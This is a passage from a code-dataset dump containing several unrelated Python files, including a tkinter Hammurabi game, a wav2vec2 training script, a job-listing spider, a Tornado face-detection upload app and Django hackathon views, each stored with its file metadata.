tk.Menu(self.menubar,tearoff=0)\r\n self.filemenu.add_command(label=\"View History\", command=self.historyWin.deiconify)\r\n self.filemenu.add_command(label=\"Quit Reign\", command=self.close_windows)\r\n self.filemenu.add_command(label=\"Quit Game\", command=self.parent.destroy)\r\n self.helpmenu = tk.Menu(self.menubar,tearoff=0)\r\n self.helpmenu.add_command(label=\"Help\", command=self.show_reign_help)\r\n self.menubar.add_cascade(label=\"File\", menu=self.filemenu)\r\n self.menubar.add_cascade(label=\"Help\", menu=self.helpmenu)\r\n self.master.config(menu=self.menubar)\r\n \r\n \r\n\r\n def show_reign_help(self):\r\n self.reignHelpWin = tk.Toplevel(self.master)\r\n self.reignHelpWin.title(\"Rules...\")\r\n self.historyWin.geometry('x'.join((str(WIN_W),str(WIN_H-265))))\r\n self.historyWin.minsize(WIN_W, WIN_H-265)\r\n self.historyWin.maxsize(WIN_W, WIN_H-265)\r\n self.playHelpLbl = tk.Label(self.reignHelpWin, text = Hammurabi.welcome(to_print=False)).pack(padx=5,pady=5)\r\n \r\n def close_windows(self):\r\n self.master.destroy()\r\n self.parent.deiconify()\r\n \r\n \r\n def update_labels(self):\r\n self.yio.set('{:3d}'.format(self.Ruler.years_ruled)) #years in office\r\n self.pop.set(self.Ruler.population) #population\r\n self.grn.set(self.Ruler.bushels_in_storage) #grain in storage\r\n self.acr.set(self.Ruler.acres_of_land) #acres owned\r\n self.ppa.set(self.Ruler.price_of_land) #price per acres\r\n # yio pop acr grn fed harvest\r\n hist_line = \"\\n{:3}\\t{:5}\\t{:5}\\t{:6}\\t{!s:5}\\t{!s:5}\".format(self.yio.get(),self.pop.get(),self.acr.get(),self.grn.get(),self.Ruler.bushels_fed, (self.Ruler.harvested_bushels_per_acre*self.Ruler.acres_planted))\r\n \r\n self.hist.set(self.hist.get() + hist_line)\r\n \r\n def update_history_text(self):\r\n self.hist_text_area.configure(state=\"normal\")\r\n self.hist_text_area.replace(1.0,'end',self.hist.get())\r\n self.hist_text_area.configure(state=\"disabled\")\r\n \r\n def bs_range(self):\r\n # set land sale limits accordingly, ignore feed and 
plant\r\n        if self.bs.get() == BUY:\r\n            maxval = int(int(self.grn.get()) / int(self.ppa.get()))\r\n        else:\r\n            maxval = int(self.acr.get())\r\n        self.val_landsale.config(to=maxval)\r\n        \r\n        # set feed limits accordingly, ignore plant\r\n        try:\r\n            maxval = int(self.grn.get()) - (int(self.bs.get()) * int(self.val_landsale.get()) * int(self.ppa.get()))\r\n            if maxval <= 0:\r\n                #self.val_feed.set('0')\r\n                self.val_feed.config(to=0)\r\n            else:\r\n                self.val_feed.config(to=maxval)\r\n        except ValueError:\r\n            pass\r\n        \r\n        # set planting limits\r\n        tmp = self.get_plant_max()\r\n        if tmp == 0:\r\n            self.plt.set('0')\r\n        self.val_plant.config(to=tmp)\r\n        \r\n        \r\n    def get_plant_max(self):\r\n        # the max allowed to plant is the least of \r\n        # 1. population * 10\r\n        # 2. acres owned (+/- current sale)\r\n        # 3. (total bushels available * 2 acres / bushel ) where total is storage +/- sale - feed\r\n        m1 = int(self.pop.get()) * 10\r\n        try:\r\n            m2 = int(self.acr.get()) + (int(self.bs.get()) * int(self.val_landsale.get()))\r\n        except:\r\n            m2 = m1\r\n        try:\r\n            tot_grn = int(self.grn.get()) - (int(self.bs.get())*int(self.val_landsale.get())*int(self.ppa.get())) - int(self.val_feed.get())\r\n            m3 = tot_grn * 2\r\n        except:\r\n            m3 = m1\r\n        \r\n        return max(0,min(m1,m2,m3))\r\n    \r\n    \r\n    def validate_sale(self, user_input):\r\n        # first, make sure scrollbox limits are up to date:\r\n        self.bs_range()\r\n        # ensure input is number\r\n        if user_input.isdigit():\r\n            minval = int(self.frame_mid.nametowidget(self.val_landsale).config('from')[4])\r\n            maxval = int(self.frame_mid.nametowidget(self.val_landsale).config('to')[4])\r\n            \r\n            if int(user_input) not in range(minval,maxval+1):\r\n                return False\r\n            return True\r\n        \r\n        elif user_input == \"\":\r\n            return True\r\n        \r\n        else:\r\n            return False\r\n    \r\n    \r\n    def validate_digit(self, user_input, W):\r\n        # first, make sure scrollbox limits are up to date:\r\n        self.bs_range()\r\n        if user_input.isdigit():\r\n            minval = int(self.frame_mid.nametowidget(W).config('from')[4])\r\n            maxval = int(self.frame_mid.nametowidget(W).config('to')[4])\r\n\r\n            if int(user_input) not in range(minval,maxval+1):\r\n                return False\r\n            return True\r\n        \r\n        elif user_input == \"\":\r\n            return True\r\n        else:\r\n            return False\r\n    \r\n\r\n    def final_check(self):\r\n        msg = None\r\n        # check that there is no blank entry\r\n        if self.val_landsale.get()=='' or self.val_feed.get()=='' or self.plt.get()=='':\r\n            msg = 'O great {}, please make sure each item has a value!'.format(self.Ruler.name)\r\n            return msg\r\n        cashOnHand = int(self.grn.get())\r\n        # check land sale\r\n        ## Is there enough acreage to sell?\r\n        ## Is there enough bushels to pay?\r\n        if self.bs.get() == BUY:\r\n            if cashOnHand < (int(self.ppa.get()) * int(self.val_landsale.get())):\r\n                msg = 'O great {}, you do not have enough grain to buy {} acres.'.format(self.Ruler.name, self.val_landsale.get())\r\n                return msg\r\n            cashOnHand -= int(self.ppa.get()) * int(self.val_landsale.get())\r\n        else:\r\n            if int(self.acr.get()) < int(self.val_landsale.get()):\r\n                msg = 'O great {}, you do not have enough land to sell {} acres.'.format(self.Ruler.name, self.val_landsale.get())\r\n                return msg\r\n            cashOnHand += int(self.ppa.get()) * int(self.val_landsale.get())\r\n        # check feed\r\n        ## Is there enough bushels to feed?\r\n        if cashOnHand < int(self.val_feed.get()):\r\n            msg = 'O great {}, you do not have enough grain to feed {} bushels.'.format(self.Ruler.name, self.val_feed.get())\r\n            return msg\r\n        cashOnHand -= int(self.val_feed.get())\r\n        # check planting\r\n        ## Is 
there enough land to plant\r\n ## Is there enough seed to plant\r\n ## Is population enough to plant\r\n if (int(self.acr.get()) + (int(self.bs.get()) * int(self.val_landsale.get()))) < int(self.plt.get()):\r\n msg = 'O great {}, you do not have enough land to plant {} acres.'.format(self.Ruler.name, self.plt.get())\r\n elif (int(self.grn.get()) * 2) < int(self.grn.get()):\r\n msg = 'O great {}, you do not have enough grain to plant {} acres.'.format(self.Ruler.name, self.plt.get())\r\n elif (int(self.pop.get()) * 10) < int(self.plt.get()):\r\n msg = 'O great {}, you do not have enough people to plant {} acres.'.format(self.Ruler.name, self.plt.get())\r\n return msg\r\n \r\n def go_action(self):\r\n #msg = \"You hit the GO button\\nLand Exchange: {}\\nFeed: {}\\nPlant: {}\".format(str(int(self.val_landsale.get())*int(self.bs.get())),self.val_feed.get(),self.plt.get())\r\n #self.oracle_text.set(msg)\r\n \r\n self.lbl_oracle_msg.config(font=('TkDefaultFont',10))\r\n \r\n msg = self.final_check()\r\n if msg != None:\r\n self.oracle_text.set(msg+'\\n')\r\n return\r\n \r\n # Obviously passed final check\r\n # Process all the calls for the year in office\r\n self.Ruler.exchange_land(int(self.bs.get()) * int(self.val_landsale.get()))\r\n\r\n self.Ruler.feed_people(int(self.val_feed.get()))\r\n \r\n self.Ruler.plant_seed(int(self.plt.get()))\r\n \r\n if not self.Ruler.update_population():\r\n # update_pop returns False if you starved too many\r\n self.oracle_text.set(self.Ruler.impeach(quiet=True))\r\n self.end_reign()\r\n \r\n self.Ruler.update_harvest()\r\n self.Ruler.update_land_price()\r\n self.Ruler.years_ruled += 1\r\n \r\n # Update the \"dashboard\" values and\r\n # Reset the choices back to 0's\r\n self.update_labels()\r\n self.update_history_text()\r\n self.re_init_vals()\r\n \r\n # set the appropriate text, which depends on \r\n # if still in office or not.\r\n if self.Ruler.in_office:\r\n if int(self.yio.get()) < self.Ruler.term:\r\n msg = self.summarize_year()\r\n self.oracle_text.set(msg)\r\n else: \r\n msg = self.Ruler.print_final_summary(mode='return')\r\n msg += '\\n'+self.get_final_score()\r\n self.oracle_text.set(msg)\r\n self.end_reign()\r\n else:\r\n self.end_reign()\r\n \r\n def re_init_vals(self):\r\n self.bs.set(BUY)\r\n self.val_landsale.delete(0,tk.END)\r\n self.val_landsale.insert(0,'0')\r\n self.val_feed.delete(0,tk.END)\r\n self.val_feed.insert(0,'0')\r\n self.val_plant.delete(0,tk.END)\r\n self.val_plant.insert(0,'0')\r\n \r\n \r\n def summarize_year(self):\r\n return self.Ruler.print_summary(mode='return')\r\n \r\n \r\n def get_final_score(self):\r\n avg_starve_rate = self.Ruler.percentage_death_rate\r\n avg_land_wealth = self.Ruler.acres_of_land / self.Ruler.population\r\n \r\n if ((avg_starve_rate > 33) or (avg_land_wealth < 7)):\r\n return self.Ruler.impeach_message\r\n elif ((avg_starve_rate > 10) or (avg_land_wealth < 9)):\r\n return self.Ruler.bad_message\r\n elif ((avg_starve_rate > 3) or (avg_land_wealth < 10)):\r\n return self.Ruler.so_so_message\r\n else:\r\n return self.Ruler.great_message\r\n\r\n \r\n \r\n def end_reign(self):\r\n # Disable all the widgets, especially \"GO\" button\r\n # Setting the oracle_text is not the responsibility of this function!\r\n self.parent.bell()\r\n self.goButton.config(state=tk.DISABLED)\r\n\r\ndef main(): \r\n random.seed()\r\n root = tk.Tk()\r\n app = Welcome(root)\r\n root.mainloop()\r\n\r\nif __name__ == '__main__':\r\n 
main()\r\n","sub_path":"Hammurabi_win.pyw","file_name":"Hammurabi_win.pyw","file_ext":"pyw","file_size_in_byte":23186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"328714079","text":"from src.DataCollatorCTCWithPadding import DataCollatorCTCWithPadding\nfrom src.Audio_Processor import Audio_Processor\nfrom transformers import Wav2Vec2ForCTC\nfrom transformers import TrainingArguments\nfrom datasets import load_metric,load_from_disk\nimport numpy as np\nfrom transformers import Trainer\nimport torch\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\ntorch.cuda.set_device(torch.device('cuda:0'))\nprocessor_save_path = './processor'\ndatasets_path = './training_data'\naudio_processor = Audio_Processor(processor_save_path=processor_save_path)\ndata_collator = DataCollatorCTCWithPadding(processor=audio_processor.processor, padding=True)\nwer_metric = load_metric(\"wer\")\n\ndef load_datasets(datasets_path):\n train_datasets = load_from_disk(os.path.join(datasets_path,'train_datasets.ds'))\n test_datasets = load_from_disk(os.path.join(datasets_path, 'test_datasets.ds'))\n return train_datasets,test_datasets\n\ndef compute_metrics(pred):\n\n pred_logits = pred.predictions\n pred_ids = np.argmax(pred_logits, axis=-1)\n\n pred.label_ids[pred.label_ids == -100] = audio_processor.processor.tokenizer.pad_token_id\n\n pred_str = audio_processor.processor.batch_decode(pred_ids)\n # we do not want to group tokens when computing the metrics\n label_str = audio_processor.processor.batch_decode(pred.label_ids, group_tokens=False)\n\n wer = wer_metric.compute(predictions=pred_str, references=label_str)\n\n return {\"wer\": wer}\n\n\ndef remove_long_common_voicedata(dataset, max_seconds=6):\n dftest = dataset.to_pandas()\n dftest['len'] = dftest['input_values'].apply(len)\n maxLength = max_seconds * 16000\n dftest = dftest[dftest['len'] < maxLength]\n dftest = dftest.drop('len', 1)\n dataset = dataset.from_pandas(dftest)\n del dftest\n return dataset\n\n\nif __name__ == '__main__':\n train_datasets, test_datasets = load_datasets(datasets_path=datasets_path)\n train_datasets = remove_long_common_voicedata(train_datasets)\n test_datasets = remove_long_common_voicedata(test_datasets)\n\n model = Wav2Vec2ForCTC.from_pretrained(\n \"facebook/wav2vec2-large-xlsr-53\",\n attention_dropout=0.1,\n hidden_dropout=0.1,\n feat_proj_dropout=0.0,\n mask_time_prob=0.05,\n layerdrop=0.1,\n gradient_checkpointing=True,\n ctc_loss_reduction=\"mean\",\n pad_token_id=audio_processor.processor.tokenizer.pad_token_id,\n vocab_size=len(audio_processor.processor.tokenizer)\n )\n\n training_args = TrainingArguments(\n output_dir=\"./train_model/wav2vec2-large-xlsr-zh_TW-8K-demo\",\n group_by_length=False,\n per_device_train_batch_size=1,\n gradient_accumulation_steps=1,\n evaluation_strategy=\"steps\",\n eval_accumulation_steps= 1,\n num_train_epochs=30,\n fp16=True,\n save_steps=400,\n eval_steps=400,\n logging_steps=400,\n learning_rate=3e-4,\n warmup_steps=500,\n save_total_limit=2,\n )\n\n trainer = Trainer(\n model=model,\n data_collator=data_collator,\n args=training_args,\n compute_metrics=compute_metrics,\n train_dataset=train_datasets,\n eval_dataset=test_datasets,\n tokenizer=audio_processor.feature_extractor,\n )\n import gc\n gc.collect()\n torch.cuda.empty_cache()\n trainer.train()","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} 
+{"seq_id":"560703514","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSaintMediaJP spider created on the top of ATSSpider\n\nscrapy crawl saintmedia_jp -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://www.saintmedia.co.jp/work/area.html\"\n\nSample URL:\n http://www.saintmedia.co.jp/work/area.html\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import HtmlFormatter, NormalizedJoin, Prefix\n\npattern = {\n 'ref_id': compile(r'detail-(\\d+)\\.'),\n}\n\n\nclass SaintMediaJP(ATSSpider):\n\n name = 'saintmedia_jp'\n logo_url = ''\n\n def parse(self, response):\n sel = Selector(response)\n # logo url\n if not self.logo_url:\n logo_url = sel.xpath(\n '//div[@id=\"headLogo\"]/a/img/@src'\n ).extract()\n if logo_url:\n self.logo_url = urljoin(response.url, logo_url[0])\n\n \"\"\" Selecting all states \"\"\"\n state_hrefs = sel.xpath(\n '//div[@id=\"search_dotbar\"]/dl[@id=\"area\"]/dd/a/@href'\n ).extract()\n for state_href in state_hrefs:\n yield Request(\n callback=self.parse_state,\n url=urljoin(response.url, state_href)\n )\n\n def parse_state(self, response):\n sel = Selector(response)\n \"\"\" Selecting all cities \"\"\"\n city_hrefs = sel.xpath(\n '//ul[@id=\"pref\"]/li/a/@href'\n ).extract()\n for city_href in city_hrefs:\n yield Request(\n callback=self.parse_jobs_list,\n url=urljoin(response.url, city_href)\n )\n\n def parse_jobs_list(self, response):\n sel = Selector(response)\n \"\"\"\n parse all jobs list and call details page\n \"\"\"\n for href in sel.xpath(\n '//div[@id=\"list_wrap\"]/div[@id=\"list_area\"]/div[@id=\"list_ttl\"]/p/a/@href'\n ).extract():\n yield Request(\n callback=self.parse_job_callback(),\n url=urljoin(response.url, href)\n )\n\n next_page = sel.xpath(\n '//div[@id=\"pager\"]/ul/li/span/../following-sibling::li[1]/a/@href'\n ).extract()\n if next_page:\n yield Request(\n callback=self.parse_jobs_list,\n url=urljoin(response.url, next_page[0])\n )\n\n def parse_job(self, response):\n \"\"\"\n Extract all required information.\n \"\"\"\n sel = Selector(response)\n\n loader = BrightcorpItemLoader(selector=sel)\n\n loader.add_xpath(\n 'title',\n '//div[@id=\"detail_area\"]/div[@id=\"detail_ttl\"]/p/text()'\n )\n loader.add_xpath(\n 'location',\n '//tr/th[contains(text(), \"%s\")]/following-sibling::td[1]/text()' % unicode('勤務地', 'utf-8')\n )\n loader.add_value(\n 'referencenumber',\n response.url,\n Prefix('%s-' % self.name),\n re=pattern['ref_id']\n )\n loader.add_value('url', response.url)\n loader.add_xpath(\n 'description',\n '//tr[th[contains(text(), \"%s\")]]' % unicode('お仕事内容', 'utf-8'),\n HtmlFormatter()\n )\n loader.add_xpath(\n 'jobtype',\n '//tr/th[contains(text(), \"%s\")]/following-sibling::td[1]/text()' % unicode('雇用形態', 'utf-8')\n )\n loader.add_xpath(\n 'baseSalary',\n '//tr/th[contains(text(), \"%s\")]/following-sibling::td[1]/text()' % unicode('給与', 'utf-8')\n )\n loader.add_xpath(\n 'workhours',\n '//tr/th[contains(text(), \"%s\")]/following-sibling::td[1]//text()' % unicode('勤務日/時間', 'utf-8'),\n NormalizedJoin(' ')\n )\n loader.add_xpath(\n 'qualifications',\n '//tr[th[contains(text(), \"%s\")]]' % unicode('応募資格', 'utf-8'),\n HtmlFormatter()\n )\n loader.add_xpath(\n 'benefits',\n '//tr[th[contains(text(), \"%s\")]]' % unicode('待遇', 'utf-8'),\n HtmlFormatter()\n )\n loader.add_xpath(\n 'other',\n '//tr[th[contains(text(), 
\"%s\")]]' % unicode('その他', 'utf-8'),\n HtmlFormatter()\n )\n loader.add_value('logo_url', self.logo_url)\n loader.add_value('apply_url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/saintmedia_jp.py","file_name":"saintmedia_jp.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"350539332","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\nimport os.path\n\nfrom setuptools import setup, find_packages\n\nscript_path = os.path.dirname(__file__)\n\nsetup(\n name='cyclonedx-bom',\n version=open(os.path.join(script_path, 'VERSION')).read(),\n url='https://github.com/CycloneDX/cyclonedx-python',\n author='Steve Springett',\n author_email='steve.springett@owasp.org',\n maintainer='Steve Springett',\n maintainer_email='steve.springett@owasp.org',\n description='CycloneDX Software Bill of Materials (SBOM) generation utility',\n long_description=open(os.path.join(script_path, 'README.md')).read(),\n long_description_content_type=\"text/markdown\",\n keywords=[\"BOM\", \"SBOM\", \"SCA\", \"OWASP\"],\n license='Apache-2.0',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Information Technology',\n 'Intended Audience :: Legal Industry',\n 'Intended Audience :: System Administrators',\n 'Topic :: Security',\n 'Topic :: Software Development',\n 'Topic :: System :: Software Distribution',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9'\n ],\n packages=find_packages(),\n python_requires='>=3.6',\n data_files=[('', ['README.md', 'requirements.txt', 'requirements-test.txt', 'VERSION'])],\n install_requires=open(os.path.join(script_path, 'requirements.txt')).read(),\n entry_points={\n 'console_scripts': [\n 'cyclonedx-py=cyclonedx_py.client:main'\n ]\n },\n zip_safe=False\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"19788884","text":"# from bs4 import BeautifulSoup\nimport requests\nimport random\nfrom datetime import datetime\nfrom datetime import timedelta\n\n\ndef get_date(day):\n\n if day == 'today':\n\n return datetime.today().strftime(\"%d.%m.%Y\")\n\n else:\n\n today_day = datetime.today()\n\n start = today_day - timedelta(days=today_day.weekday())\n choosen_day = start + timedelta(days=day)\n return choosen_day.strftime(\"%d.%m.%Y\")\n\n\ndef get_schedule_dict(day):\n\n date = get_date(day)\n\n url = 'https://www.chsu.ru/raspisanie'\n\n r = requests.post(url, data=get_body(date),\n headers=get_headers(), params=get_params()) # params=get_params())\n\n try:\n return r.json()\n except:\n\n print('Something went wrong!')\n\n\ndef get_body(date):\n\n body = '_TimeTable_WAR_TimeTableportlet_cmd=timeTable&_TimeTable_WAR_TimeTableportlet_typeTimeTable=period&_TimeTable_WAR_TimeTableportlet_group=7%D0%AD%D0%91-01-51%D0%BE%D0%BF&_TimeTable_WAR_TimeTableportlet_semester=1+%D1%81%D0%B5%D0%BC%D0%B5%D1%81%D1%82%D1%80+2016%2F2017&_TimeTable_WAR_TimeTableportlet_type=student&_TimeTable_WAR_TimeTableportlet_startDate=' + \\\n date+'&_TimeTable_WAR_TimeTableportlet_endDate=' + \\\n date # &_TimeTable_WAR_TimeTableportlet_professor=3741'\n\n return body\n\n\ndef 
get_headers():\n\n headers = {'Sec-Fetch-Mode': 'cors',\n 'Sec-Fetch-Site': 'same-origin',\n 'Origin': 'https://www.chsu.ru',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36',\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'Accept': '*/*',\n 'Referer': 'https://www.chsu.ru/raspisanie',\n 'X-Requested-With': 'XMLHttpRequest',\n 'Connection': 'keep-alive'}\n\n return headers\n\n\ndef get_params():\n\n params = {'p_p_id': 'TimeTable_WAR_TimeTableportlet',\n 'p_p_lifecycle': '2',\n 'p_p_state': 'normal',\n 'p_p_mode': 'view',\n 'p_p_cacheability': 'cacheLevelPage',\n 'p_p_col_id': 'column-1',\n 'p_p_col_count': '1',\n }\n\n return params\n\n\ndef get_text(data):\n\n result = ''\n for i in data.get('response')['items']:\n\n time = str(i.get('time'))\n aud = str(i.get('audience'))\n prof_name = str(i.get('professor')['name'])\n disc = str(i.get('discipline'))\n\n result = result + (time+' | '+disc+' | '+aud+' | '+prof_name) + '\\n'\n\n return result if result != '' else 'нет пар'\n\n\ndef get_schedule(day):\n\n return get_text(get_schedule_dict(day))\n\n\n# if __name__ == '__main__':\n\n# print(get_schedule('today'))\n","sub_path":"db_tutorial/mybots/vk_bot/schedule/pars_schedule.py","file_name":"pars_schedule.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"464106710","text":"import tornado.ioloop\nimport tornado.web\nimport os\nimport base64\nimport face_detect\nimport pic_pretreatment\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"main.html\")\n\nclass UpLoadHandler(tornado.web.RequestHandler):\n def post(self):\n # get and save original picture\n data = self.get_argument(\"data\")\n picData = base64.b64decode(data)\n pic_file = open(\"static/original.jpg\", \"w\")\n pic_file.write(picData)\n pic_file.close()\n # face detection\n region = face_detect.process(\"static/original.jpg\", \"static/detected.jpg\")\n # pretreatment\n pic_pretreatment.process(region, \n grayfile = \"static/gray.jpg\", \n smoothfile = \"static/smooth.jpg\",\n equfile = \"static/equ.jpg\",\n )\n self.write(\"uploadok\")\n\n\nclass PicProcessHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"picprocess.html\", \n original = \"static/original.jpg\", \n detected = \"static/detected.jpg\", \n gray = \"static/gray.jpg\", \n smooth = \"static/smooth.jpg\",\n equ = \"static/equ.jpg\",\n )\n\n\nsettings = {\n \"static_path\": os.path.join(os.path.dirname(__file__), \"static\"),\n \"cookie_secret\": \"61oETzKXQAGaYdkL5gEmGeJJFuYh7EQnp2XdTP1o/Vo=\",\n \"login_url\": \"/login\",\n \"xsrf_cookies\": False,\n}\n\napplication = tornado.web.Application([\n (r\"/\", MainHandler),\n (r\"/upload\", UpLoadHandler),\n (r\"/picprocess\", PicProcessHandler),\n (r\"/(favicon\\.ico)\", tornado.web.StaticFileHandler, dict(path=settings['static_path'])),\n], debug = True, **settings)\n\nif __name__ == \"__main__\":\n application.listen(8888)\n tornado.ioloop.IOLoop.instance().start()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"538600672","text":"#!/usr/bin/env python\n\n#function overwrites \"student_answer.py\" file using the 2 passed command line 
arguments\ndef write_to_py(students_code, test_case):\n f = open('/afs/cad.njit.edu/u/r/l/rl265/public_html/php/student_answer.py', 'w') #opens \"student_answer.py\" to be written to\n f.write(students_code + \"\\n\" + \"print(\" + test_case + \")\") #writes the students code then runs test case in \"student_answer.py\"\n f.close()\n\nif __name__ == '__main__': #accepts arguments from php\n import sys #needed to call arguments\n write_to_py(sys.argv[1], sys.argv[2]) #calls write_to_py() with 1st and 2nd passed arguments\n","sub_path":"4-06-2018/Every File/php/overwrite.py","file_name":"overwrite.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"56381203","text":"from django.core import serializers\nfrom .models import Judge\nfrom .models import Team\nfrom collections import defaultdict\nfrom .models import Mentor\nfrom .models import Mentoring\nfrom .models import Challenge\nfrom django.shortcuts import render\n\nfrom django.shortcuts import render\nfrom django.shortcuts import HttpResponse\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nimport logging\nfrom dateutil import parser\nfrom django.contrib.auth.models import User\nfrom django.views.decorators.csrf import csrf_protect, csrf_exempt\nfrom .models import Student\nfrom .controllers import AuthenticationController as authentication\nimport json\nimport http\n\n\n@csrf_exempt\ndef get_listOf_project(request):\n user_model = request.user\n try:\n Judger_model = Judge.objects.get(user_id=user_model)\n except:\n return HttpResponse(\"O usuário logado não é um jurado, você está tentando burlar o sistema?\")\n lof_teams = Team.objects.filter(\n challenge=Judger_model.challenge,).exclude(link_project=None)\n data = lof_teams.values()\n\n return JsonResponse(list(data), safe=False)\n\n\n@csrf_exempt\ndef sendprojectlink(request):\n try:\n student_model = Student.objects.get(user_id=request.user)\n except:\n return HttpResponse(\"Usuário não é um estudante\")\n team_model = student_model.team_id\n team_model.link_project = request.GET.get(\"link\")\n\n team_model.save()\n return HttpResponse(\"OK\")\n\n\n@csrf_exempt\ndef register__old__Team(request):\n\n data = json.loads(request.body)\n try:\n team_name = data['team_name']\n desafio_id = 0 # O primeiro elemento vai ser um desafio nulo\n\n Team.objects.create(name=team_name, desafio_id=desafio_id)\n\n return JsonResponse({\n \"status\": \"OK\",\n }, safe=False)\n except:\n return JsonResponse({\n \"status\": \"failed\",\n }, safe=False)\n\n\n #authentication.registerTeam(team_name = data[\"team_name\"])\nstate = defaultdict(None)\n\n\ndef get_selections_mentor(request):\n user = request.user\n student = Student.objects.filter(user_id=user)\n student_first = student.first()\n\n if student_first is None:\n # Checando se o valor é de outro tipo\n isMentor = Mentor.objects.filter(user=user).exists()\n isJudger = Judge.objects.filter(user_id=user).exists()\n if isMentor:\n return HttpResponse(\"Usuário é um mentor\")\n elif isJudger:\n return HttpResponse(\"Usuário é um jurado\")\n\n if student_first.team_id is None:\n return HttpResponse(\"O estudante não tem um time\")\n\n mentoring_for_the_team = 
Mentoring.objects.filter(\n team=student_first.team_id)\n lof_mentoring_for_the_team = list(mentoring_for_the_team.values())\n\n filter_ = [x['mentor_id'] for x in lof_mentoring_for_the_team]\n for ind, id_ in enumerate(filter_):\n mentor = Mentor.objects.get(id=id_)\n lof_mentoring_for_the_team[ind][\"mentor_name\"] = mentor.user.first_name + \\\n \" \" + mentor.user.last_name\n lof_mentoring_for_the_team[ind]['data_meeting'] = lof_mentoring_for_the_team[ind]['time_meeting']\n del lof_mentoring_for_the_team[ind][\"time_meeting\"]\n\n return JsonResponse(lof_mentoring_for_the_team, safe=False)\n\n\n@csrf_exempt\ndef check_user_type(request):\n user_model = request.user\n isStudent = Student.objects.filter(user_id=user_model).exists()\n isMentor = Mentor.objects.filter(user=user_model).exists()\n isJudger = Judge.objects.filter(user_id=user_model).exists()\n\n if isStudent:\n return HttpResponse(\"Student\")\n elif isMentor:\n return HttpResponse(\"Mentor\")\n elif isJudger:\n return HttpResponse(\"Judger\")\n\n\ndef get_mentor_info(request):\n user_model = request.user\n mentor_model = Mentor.objects.get(user=user_model)\n data = dict()\n\n data['user'] = {\n 'name': user_model.first_name + \" \" + user_model.last_name\n }\n\n data['challenge'] = {\n \"id\": mentor_model.challenge.id,\n \"name\": mentor_model.challenge.name,\n \"enterprise\": mentor_model.challenge.empresa_desafiadora,\n \"description\": mentor_model.challenge.description\n }\n data['id'] = mentor_model.id\n data[\"kind\"] = \"Mentor\"\n\n return JsonResponse(data)\n\n\n@csrf_exempt\ndef get_user_info(request):\n user = request.user\n data = dict()\n user_category = Student.objects.filter(user_id=user)\n if user_category.exists():\n user_category_model = user_category.first()\n #team_id = Team.objects.filter(id = user_category_model.team_id)\n team_id = user_category_model.team_id\n\n data['user'] = {\n 'name': user_category_model.user_id.first_name + \" \" + user_category_model.user_id.last_name\n }\n\n if team_id is not None:\n team_id_model = team_id\n data['team'] = {\n \"id\": team_id_model.id,\n \"challenge\": team_id_model.challenge.name,\n }\n else:\n data['team'] = None\n else:\n data['user'] = None\n user_category = Mentor.objects.filter(user=user)\n if user_category.exists():\n return get_mentor_info(request)\n\n data['kind'] = \"Student\"\n return JsonResponse(data)\n\n\n@csrf_exempt\n@login_required\ndef get_teams(request):\n judger = Judge.objects.get(user_id=request.user)\n # Apenas a equipe que contem o desafio do jurado\n teams = Team.objects.filter(challenge_id=judger.challenge_id)\n lofs = list(teams.values())\n challenges_ids = [x['challenge_id'] for x in lofs]\n challenge_list = []\n for x in challenges_ids:\n challenge_unique = Challenge.objects.get(id=x)\n challenge_list.append({\n \"id\": challenge_unique.id,\n \"name\": challenge_unique.name,\n \"challenger_enterprise\": challenge_unique.empresa_desafiadora\n })\n\n for ind, val in enumerate(lofs):\n lofs[ind]['challenge_id'] = challenge_list[ind]\n temp = lofs\n # Retornando os dados no estilo json\n json_format = JsonResponse(temp, safe=False)\n return json_format\n\n\n@csrf_exempt\ndef set_points(request):\n # Receber o juiz\n judger = Judge.objects.get(user_id=request.user)\n # Realizar a inserção da nota\n # Obter o team_id que será enviado pelo sistema\n team_id = request.GET.get(\"team_id\")\n noteJudger = request.GET.get(\"note\")\n team = Team.objects.get(id=int(team_id))\n team.judger_assign = judger\n team.noteJudger = 
